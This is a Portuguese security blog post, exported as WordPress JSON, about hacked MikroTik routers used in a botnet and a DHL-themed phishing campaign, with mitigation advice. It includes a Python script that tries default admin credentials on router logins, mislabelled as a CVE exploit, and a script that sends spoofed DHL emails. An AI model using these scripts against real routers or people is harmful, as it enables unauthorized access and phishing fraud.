{"id":21617,"date":"2025-01-22T11:29:55","date_gmt":"2025-01-22T14:29:55","guid":{"rendered":"https:\/\/www.ethicalhacker.com.br\/site\/?p=21617"},"modified":"2025-01-22T11:29:56","modified_gmt":"2025-01-22T14:29:56","slug":"mikrotik-hackeados-sao-usados-para-espalhar-malware","status":"publish","type":"post","link":"https:\/\/www.ethicalhacker.com.br\/site\/2025\/01\/exploits\/mikrotik-hackeados-sao-usados-para-espalhar-malware\/","title":{"rendered":"MikroTik hackeados s\u00e3o usados para espalhar malware"},"content":{"rendered":"\n<p data-pm-slice=\"1 1 []\"><strong>Botnet: Roteadores da MikroTik hackeados usados para espalhar malware<\/strong><\/p>\n<p style=\"text-align: justify;\" data-pm-slice=\"1 1 []\">A ciberseguran\u00e7a \u00e9 um tema cada vez mais relevante, especialmente em um mundo onde dispositivos conectados s\u00e3o alvos constantes de ataques. Recentemente, cerca de 13 mil roteadores MikroTik foram comprometidos e utilizados em uma botnet para disseminar malware, realizar ataques DDoS e outras atividades maliciosas. Este artigo explora como isso aconteceu, as vulnerabilidades envolvidas, as consequ\u00eancias e como proteger seus dispositivos.<\/p>\n<p data-pm-slice=\"1 1 []\">\u00a0<\/p>\n<p data-pm-slice=\"1 3 []\"><strong>A campanha maliciosa sobre o MikroTik<\/strong><\/p>\n<p style=\"text-align: justify;\">Em novembro de 2024, a empresa de ciberseguran\u00e7a Infoblox revelou que criminosos exploraram registros de DNS mal configurados em dispositivos MikroTik. Usando esses roteadores, enviaram e-mails fraudulentos que imitavam a empresa de log\u00edstica DHL, induzindo usu\u00e1rios a baixar um arquivo ZIP contendo um trojan perigoso.<\/p>\n<p>\u00a0<\/p>\n<p><strong>Como funciona o ataque<\/strong><\/p>\n<ul data-spread=\"true\">\n<li>\n<p style=\"text-align: justify;\"><strong>Explora\u00e7\u00e3o inicial:<\/strong> Os criminosos identificam roteadores vulner\u00e1veis, utilizando a falha CVE-2023-30799 para obter acesso total ao dispositivo.<\/p>\n<\/li>\n<li>\n<p style=\"text-align: justify;\"><strong>Envio de e-mails falsos:<\/strong> A botnet dispara dezenas de milhares de mensagens fraudulentas, que podem parecer leg\u00edtimas, mas cont\u00eam malware escondido.<\/p>\n<\/li>\n<li>\n<p style=\"text-align: justify;\"><strong>Infec\u00e7\u00e3o com trojan:<\/strong> Quando o destinat\u00e1rio baixa e executa o arquivo, o trojan \u00e9 instalado silenciosamente, permitindo acesso remoto ao sistema comprometido.<\/p>\n<\/li>\n<li>\n<p style=\"text-align: justify;\"><strong>A\u00e7\u00f5es il\u00edcitas:<\/strong> Os dispositivos s\u00e3o utilizados para ataques de phishing, roubo de dados e ataques de nega\u00e7\u00e3o de servi\u00e7o (DDoS).<\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"aligncenter\" src=\"https:\/\/tm.ibxk.com.br\/2025\/01\/21\/21125858778085.jpg?ims=328x\" alt=\"A campanha maliciosa foi apelidada de \" width=\"593\" height=\"334\" \/><\/p>\n<p style=\"text-align: center;\"><strong>Infoblox\/Reprodu\u00e7\u00e3o\u00a0A campanha maliciosa foi apelidada de &#8220;Mikro Typo&#8221;. (Imagem: Infoblox\/Reprodu\u00e7\u00e3o)<\/strong><\/p>\n<p>\u00a0<\/p>\n<p data-pm-slice=\"1 1 []\"><strong>Exemplos de scripts maliciosos\u00a0<\/strong><\/p>\n<p>Aqui est\u00e3o dois exemplos de como scripts podem ser usados em campanhas maliciosas:<\/p>\n<p data-pm-slice=\"1 1 []\"><strong>1. Script para automatizar a explora\u00e7\u00e3o da vulnerabilidade<\/strong><\/p>\n<p data-pm-slice=\"1 1 []\">\u00a0<\/p>\n<p><strong>import requests<\/strong><\/p>\n<p><strong>def explorar_roteador(ip, credenciais):<\/strong><br \/><strong>\u00a0 \u00a0 \u00a0 \u00a0 url = f&#8221;http:\/\/{ip}\/login&#8221;<\/strong><br \/><strong>\u00a0 \u00a0 \u00a0 \u00a0 payload = {&#8220;username&#8221;: credenciais[0], &#8220;password&#8221;: credenciais[1]}<\/strong><br \/><br \/><strong>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0resposta = requests.post(url, data=payload)<\/strong><br \/><strong>\u00a0 \u00a0 \u00a0 \u00a0 if resposta.status_code == 200 and &#8220;sucesso&#8221; in resposta.text:<\/strong><br \/><strong>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0print(f&#8221;Dispositivo {ip} comprometido!&#8221;)<\/strong><br \/><strong>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0 \u00a0return True<\/strong><br \/><strong>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0return False<\/strong><\/p>\n<p><strong># Lista de IPs alvo<\/strong><br \/><strong>ips_alvo = [&#8220;192.168.1.1&#8221;, &#8220;192.168.2.1&#8221;]<\/strong><br \/><strong>credenciais = (&#8220;admin&#8221;, &#8220;admin&#8221;)<\/strong><\/p>\n<p><strong>for ip in ips_alvo:<\/strong><br \/><strong>\u00a0 \u00a0 \u00a0 \u00a0explorar_roteador(ip, credenciais)<\/strong><\/p>\n<p>\u00a0<\/p>\n<p data-pm-slice=\"1 1 []\"><strong>2. Script para envio de e-mails fraudulentos<\/strong><\/p>\n<p data-pm-slice=\"1 1 []\">\u00a0<\/p>\n<p><strong>import smtplib<\/strong><br \/><strong>from email.mime.text import MIMEText<\/strong><\/p>\n<p><strong>def enviar_email(destinatario, assunto, corpo):<\/strong><br \/><strong>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0servidor = smtplib.SMTP(&#8216;smtp.fraudulento.com&#8217;, 587)<\/strong><br \/><strong>\u00a0 \u00a0 \u00a0 \u00a0 \u00a0servidor.starttls()<\/strong><br \/><strong>\u00a0 \u00a0 \u00a0 \u00a0 servidor.login(&#8220;usuario@exemplo.com&#8221;, &#8220;senha&#8221;)<\/strong><\/p>\n<p><strong>\u00a0 \u00a0 \u00a0 \u00a0 mensagem = MIMEText(corpo)<\/strong><br \/><strong>\u00a0 \u00a0 \u00a0 \u00a0 mensagem[&#8216;From&#8217;] = &#8220;dhl@suporte.com&#8221;<\/strong><br \/><strong>\u00a0 \u00a0 \u00a0 \u00a0 mensagem[&#8216;To&#8217;] = destinatario<\/strong><br \/><strong>\u00a0 \u00a0 \u00a0 \u00a0 mensagem[&#8216;Subject&#8217;] = assunto<\/strong><\/p>\n<p><strong>\u00a0 \u00a0 \u00a0 \u00a0 servidor.sendmail(&#8220;dhl@suporte.com&#8221;, destinatario, mensagem.as_string())<\/strong><br \/><strong>\u00a0 \u00a0 \u00a0 \u00a0 servidor.quit()<\/strong><\/p>\n<p><strong># Envio de e-mails maliciosos<\/strong><br \/><strong>emails = [&#8220;vitima1@exemplo.com&#8221;, &#8220;vitima2@exemplo.com&#8221;]<\/strong><br \/><strong>for email in emails:<\/strong><br \/><strong>\u00a0 \u00a0 \u00a0 \u00a0 enviar_email(email, &#8220;Entrega pendente&#8221;, &#8220;Baixe os documentos em anexo.&#8221;)<\/strong><\/p>\n<p data-pm-slice=\"1 1 []\">\u00a0<\/p>\n<p data-pm-slice=\"1 3 []\"><strong>Como se proteger<\/strong><\/p>\n<p>Os pesquisadores recomendam as seguintes medidas para mitigar os riscos:<\/p>\n<ul data-spread=\"true\">\n<li>\n<p><strong>Atualiza\u00e7\u00e3o de firmware:<\/strong> Instale as atualiza\u00e7\u00f5es mais recentes fornecidas pela MikroTik.<\/p>\n<\/li>\n<li>\n<p style=\"text-align: justify;\"><strong>Mudan\u00e7a de credenciais:<\/strong> Substitua as credenciais padr\u00e3o por senhas fortes e exclusivas.<\/p>\n<\/li>\n<li>\n<p style=\"text-align: justify;\"><strong>Configura\u00e7\u00e3o adequada do DNS:<\/strong> Certifique-se de que os registros de DNS estejam configurados corretamente para evitar explora\u00e7\u00f5es.<\/p>\n<\/li>\n<li>\n<p style=\"text-align: justify;\"><strong>Monitoramento cont\u00ednuo:<\/strong> Use ferramentas de monitoramento para detectar atividades incomuns em sua rede.<\/p>\n<\/li>\n<\/ul>\n<p>\u00a0<\/p>\n<p data-pm-slice=\"1 1 []\"><strong>Conclus\u00e3o<\/strong><\/p>\n<p style=\"text-align: justify;\">O caso dos roteadores MikroTik hackeados \u00e9 um alerta importante sobre a necessidade de medidas rigorosas de seguran\u00e7a. Os cibercriminosos continuam a explorar vulnerabilidades conhecidas, tornando essencial a manuten\u00e7\u00e3o regular e a prote\u00e7\u00e3o proativa dos dispositivos conectados. Esteja sempre atento \u00e0s atualiza\u00e7\u00f5es de seguran\u00e7a e tome precau\u00e7\u00f5es para proteger sua rede.<\/p>\n<p>\u00a0<\/p>\n<p>Fonte e imagens: <a href=\"https:\/\/www.tecmundo.com.br\/seguranca\/401727-botnet-roteadores-da-mikrotik-hackeados-sao-usados-para-espalhar-malware.htm\" target=\"_blank\" rel=\"noopener\">https:\/\/www.tecmundo.com.br\/seguranca\/401727-botnet-roteadores-da-mikrotik-hackeados-sao-usados-para-espalhar-malware.htm<\/a><\/p>\n<p>\u00a0<\/p>\n\n\n","protected":false},"excerpt":{"rendered":"<p>Botnet: Roteadores da MikroTik hackeados usados para espalhar malware A ciberseguran\u00e7a \u00e9 um tema cada vez mais relevante, especialmente em um mundo onde dispositivos conectados s\u00e3o alvos constantes de ataques. Recentemente, cerca de 13 mil roteadores MikroTik foram comprometidos e utilizados em uma botnet para disseminar malware, realizar ataques DDoS e outras atividades maliciosas. Este [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":21625,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[89,100,21,105],"tags":[],"class_list":["post-21617","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-basico","category-diversos","category-exploits","category-noticias"],"_links":{"self":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/21617","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/comments?post=21617"}],"version-history":[{"count":8,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/21617\/revisions"}],"predecessor-version":[{"id":21626,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/posts\/21617\/revisions\/21626"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media\/21625"}],"wp:attachment":[{"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/media?parent=21617"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/categories?post=21617"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ethicalhacker.com.br\/site\/wp-json\/wp\/v2\/tags?post=21617"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}